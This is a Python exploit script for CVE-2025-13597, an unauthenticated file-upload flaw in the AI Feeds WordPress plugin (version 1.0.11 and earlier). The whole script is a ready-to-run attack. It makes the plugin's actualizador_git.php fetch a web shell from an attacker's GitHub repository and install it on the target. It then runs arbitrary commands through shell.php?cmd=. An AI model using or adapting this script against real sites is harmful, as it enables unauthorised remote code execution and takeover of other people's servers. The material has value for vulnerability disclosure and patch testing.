# Exploit Title: AI Feeds <= 1.0.11 - Unauthenticated Arbitrary File Upload
# Date: 11/22/2025
# Exploit Author: Ryan Kozak
# Vendor Homepage: https://ai.cibeles.net/
# Version: <= 1.0.11
# CVE : CVE-2025-13597

import argparse
import requests


def exploit(target, owner, repo, token, command):
    print("[*] Exploiting actualizador_git.php vulnerability...")
    print(f"[*] Downloading and installing shell from GitHub repository: {owner}/{repo}")
    
    exploit_url = f"{target}/wp-content/plugins/ai-feeds/actualizador_git.php"
    params = {
        'owner': owner,
        'repo': repo,
        'ref': 'main',
        'token': token
    }
    
    response = requests.get(exploit_url, params=params, timeout=30)
    print(response.text.strip())
    
    print("\n[*] Exploit executed. Checking if shell.php was created...\n")
    
    print("[*] Testing shell access...")
    shell_url = f"{target}/wp-content/plugins/ai-feeds/shell.php"
    shell_params = {'cmd': command}
    
    response = requests.get(shell_url, params=shell_params, timeout=10)
    print(response.text.strip())
    
    print("\n")
    print("[*] Shell should be accessible at:")
    print(f"    {target}/wp-content/plugins/ai-feeds/shell.php?cmd=COMMAND")


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', required=True, help='Target URL')
    parser.add_argument('-o', '--owner', required=True, help='GitHub repository owner')
    parser.add_argument('-r', '--repo', required=True, help='GitHub repository name')
    parser.add_argument('-k', '--token', required=True, help='GitHub Personal Access Token')
    parser.add_argument('-c', '--command', default='whoami', help='Command to execute (default: whoami)')
    
    args = parser.parse_args()
    
    exploit(args.target, args.owner, args.repo, args.token, args.command)


if __name__ == '__main__':
    main()